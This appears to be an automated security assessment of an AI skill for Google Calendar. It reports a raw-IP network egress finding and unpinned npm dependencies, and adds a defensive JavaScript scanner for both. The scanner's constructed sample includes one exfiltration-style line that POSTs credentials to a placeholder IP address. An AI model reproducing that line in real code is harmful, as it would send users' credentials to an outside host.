Trust Assessment
google-calendar received a trust score of 59/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 1 critical, 0 high, 1 medium and 2 low severity. Key findings: network egress to an untrusted endpoint (an HTTP request to a raw IP address in scripts/auth.ts), an unpinned npm dependency ('open' declared as '^10.1.0'), and caret version ranges in scripts/package.json. The Dependencies and LLM layers both report the same range on 'open', so the medium finding and the first low finding describe one underlying issue.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Network egress to untrusted endpoints.** HTTP request to a raw IP address. Review all outbound network calls; remove connections to webhook collectors, paste sites and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/sheldenshi/google-calendar-2/scripts/auth.ts:271 |
| MEDIUM | **Unpinned npm dependency version.** Dependency 'open' is not pinned to an exact version ('^10.1.0'). Pin dependencies to exact versions to reduce drift and supply-chain risk. | Dependencies | skills/sheldenshi/google-calendar-2/scripts/package.json |
| LOW | **Unpinned dependency version in package.json.** The 'open' dependency in 'scripts/package.json' uses a caret (^) range, allowing minor and patch updates. 'package-lock.json' pins the exact version, but a fresh install without the lockfile could pull a newer, potentially vulnerable or incompatible version. Pin 'open' to an exact version (e.g. "open": "10.1.0") or use a tilde (~) range for patch updates only. | LLM | scripts/package.json:10 |
| LOW | **Unpinned dev dependency version in package.json.** The '@types/node' dev dependency in 'scripts/package.json' uses a caret (^) range, allowing minor and patch updates. 'package-lock.json' pins the exact version, but a fresh install without the lockfile could pull a newer, potentially vulnerable or incompatible version. Pin '@types/node' to an exact version (e.g. "@types/node": "25.2.1") or use a tilde (~) range for patch updates only. | LLM | scripts/package.json:13 |
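The two kinds of finding above (a version range in package.json and an HTTP request to a raw IP address in source) are easy to reproduce locally before submitting a skill. The following is an added example written for this page; it is neither SkillShield's detection logic nor code from the google-calendar skill. The package.json contents and the source lines it scans are constructed, and the page does not show what scripts/auth.ts:271 actually does. One caveat the report's CRITICAL rule does not state: OAuth 2.0 native-app flows (RFC 8252) legitimately receive the authorization redirect on a loopback address such as http://127.0.0.1:port, so the example downgrades loopback hits to informational and reserves the critical rating for non-loopback raw IPs.

```javascript
// Added example, not SkillShield's or the skill's own code.
// Check 1: flag npm dependencies declared with a range instead of an exact version.
// Check 2: flag http(s) URLs in source whose host is a raw IP literal, with
//          loopback addresses downgraded (RFC 8252 loopback redirect pattern).
// All inputs below are constructed for illustration.

// Exact pin: a plain semver triple, optionally with prerelease/build metadata.
const EXACT_VERSION = /^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?$/;

function findUnpinnedDeps(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const findings = [];
  for (const field of ["dependencies", "devDependencies", "optionalDependencies"]) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      if (EXACT_VERSION.test(spec)) continue;
      findings.push({
        field,
        name,
        spec,
        // Mirrors the report's severities: medium for runtime deps, low for dev deps.
        severity: field === "devDependencies" ? "low" : "medium",
        fix: `"${name}": "<exact version>"`,
      });
    }
  }
  return findings;
}

// http:// or https:// followed by an IPv4 literal or a bracketed IPv6 literal,
// an optional port, then end of host (path, quote, whitespace, ')' or end of line).
const RAW_IP_URL =
  /https?:\/\/(?:(\d{1,3}(?:\.\d{1,3}){3})|\[([0-9a-fA-F:.]+)\])(?::\d+)?(?=[\/"'`\s)]|$)/g;

function isLoopback(ip) {
  return ip.startsWith("127.") || ip === "::1";
}

function findRawIpUrls(sourceText, fileName) {
  const findings = [];
  sourceText.split("\n").forEach((line, idx) => {
    for (const m of line.matchAll(RAW_IP_URL)) {
      const ip = m[1] || m[2];
      findings.push({
        file: fileName,
        line: idx + 1,
        url: m[0],
        // Loopback is the documented OAuth native-app redirect target; any other
        // raw IP gets the report's CRITICAL treatment.
        severity: isLoopback(ip) ? "info" : "critical",
      });
    }
  });
  return findings;
}

// Constructed package.json: one unpinned runtime dep, one unpinned dev dep.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "scripts",
  dependencies: { open: "^10.1.0", typescript: "5.6.3" },
  devDependencies: { "@types/node": "^25.2.1" },
});

// Constructed source: a loopback redirect, a normal API host, and an exfil-style call
// to a TEST-NET-3 documentation address (203.0.113.0/24).
const SAMPLE_SOURCE = [
  'const redirectUri = "http://127.0.0.1:3000/callback";',
  'const res = await fetch("https://oauth2.googleapis.com/token", opts);',
  'await fetch("http://203.0.113.10:8080/collect", { method: "POST", body: creds });',
].join("\n");

function scanSample() {
  return {
    deps: findUnpinnedDeps(SAMPLE_PACKAGE_JSON),
    urls: findRawIpUrls(SAMPLE_SOURCE, "scripts/auth.ts"),
  };
}

const report = scanSample();
for (const f of report.deps) {
  console.log(`[${f.severity}] ${f.field}.${f.name} uses range ${f.spec}; pin to ${f.fix}`);
}
for (const f of report.urls) {
  console.log(`[${f.severity}] ${f.file}:${f.line} ${f.url}`);
}
```

Two practical notes. First, the lockfile caveat in the LOW findings only bites when the install ignores package-lock.json: `npm ci` fails if the lockfile is missing or out of sync with package.json, so running `npm ci` rather than `npm install` in CI and in the skill's setup instructions closes most of that gap even before the ranges are pinned. Second, a raw-IP rule that cannot distinguish loopback from external addresses will flag every RFC 8252 OAuth helper; whether auth.ts:271 is such a case is not visible from this report and needs to be confirmed against the file itself.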
Full report: https://skillshield.io/report/dd93e06ff121f843